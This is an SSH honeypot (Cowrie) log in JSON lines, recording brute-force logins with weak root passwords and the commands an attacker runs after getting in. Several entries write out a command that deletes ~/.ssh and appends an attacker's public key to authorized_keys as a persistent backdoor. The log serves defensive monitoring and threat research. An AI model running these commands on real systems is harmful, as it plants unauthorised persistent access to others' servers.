{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:26:57.618080Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.login.failed","username":"test","password":"qwerty","message":"login attempt [test/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T11:26:58.110066Z","src_ip":"212.227.125.160","session":"1ec624f66614"}
{"eventid":"cowrie.login.success","username":"root","password":"vps123456","message":"login attempt [root/vps123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:26:58.628900Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:26:59.137247Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:26:59.138193Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:26:59.139466Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:59.285349Z","src_ip":"212.227.125.160","session":"1ec624f66614"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:26:59.382253Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:26:59.926133Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:26:59.926898Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:27:00.171648Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:00.172635Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50092,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f551e50786","protocol":"ssh","message":"New connection: 212.227.235.229:50092 (1.2.3.4:22) [session: 14f551e50786]","sensor":"my-vps","timestamp":"2025-08-28T11:27:00.416131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:00.417099Z","src_ip":"212.227.235.229","session":"14f551e50786"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:00.662227Z","src_ip":"212.227.235.229","session":"14f551e50786"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:27:02.389997Z","src_ip":"212.227.235.229","session":"14f551e50786"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:03.639258Z","src_ip":"212.227.235.229","session":"14f551e50786"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50469,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc3ab0143fa9","protocol":"ssh","message":"New connection: 212.227.235.229:50469 (1.2.3.4:22) [session: dc3ab0143fa9]","sensor":"my-vps","timestamp":"2025-08-28T11:27:03.878503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:03.879451Z","src_ip":"212.227.235.229","session":"dc3ab0143fa9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:04.113488Z","src_ip":"212.227.235.229","session":"dc3ab0143fa9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:05.768574Z","src_ip":"212.227.235.229","session":"dc3ab0143fa9"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:06.003708Z","src_ip":"212.227.235.229","session":"27881d51bd4f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:06.005885Z","src_ip":"212.227.235.229","session":"dc3ab0143fa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49866,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d2b25ee7f55","protocol":"ssh","message":"New connection: 212.227.235.229:49866 (1.2.3.4:22) [session: 4d2b25ee7f55]","sensor":"my-vps","timestamp":"2025-08-28T11:27:07.485327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:07.486349Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:07.800688Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.login.success","username":"root","password":"asdf1111","message":"login attempt [root/asdf1111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:09.100175Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:09.751227Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:09.751933Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:09.753047Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:10.068876Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:10.755826Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:27:10.756610Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:27:11.073728Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:11.074796Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49874,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0c540a73c23","protocol":"ssh","message":"New connection: 212.227.235.229:49874 (1.2.3.4:22) [session: c0c540a73c23]","sensor":"my-vps","timestamp":"2025-08-28T11:27:11.386530Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:11.387675Z","src_ip":"212.227.235.229","session":"c0c540a73c23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:11.700654Z","src_ip":"212.227.235.229","session":"c0c540a73c23"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:27:12.992887Z","src_ip":"212.227.235.229","session":"c0c540a73c23"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:14.309142Z","src_ip":"212.227.235.229","session":"c0c540a73c23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43072,"dst_ip":"1.2.3.4","dst_port":22,"session":"c939251f98f1","protocol":"ssh","message":"New connection: 212.227.235.229:43072 (1.2.3.4:22) [session: c939251f98f1]","sensor":"my-vps","timestamp":"2025-08-28T11:27:14.639017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:14.639947Z","src_ip":"212.227.235.229","session":"c939251f98f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:14.970757Z","src_ip":"212.227.235.229","session":"c939251f98f1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:16.333707Z","src_ip":"212.227.235.229","session":"c939251f98f1"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:16.665131Z","src_ip":"212.227.235.229","session":"4d2b25ee7f55"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:16.666216Z","src_ip":"212.227.235.229","session":"c939251f98f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46314,"dst_ip":"1.2.3.4","dst_port":22,"session":"1020a01cbdcb","protocol":"ssh","message":"New connection: 212.227.235.229:46314 (1.2.3.4:22) [session: 1020a01cbdcb]","sensor":"my-vps","timestamp":"2025-08-28T11:27:20.833323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:20.834128Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:21.105375Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.login.success","username":"root","password":"password123@","message":"login attempt [root/password123@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:22.232626Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:23.196424Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:23.197096Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:23.198180Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
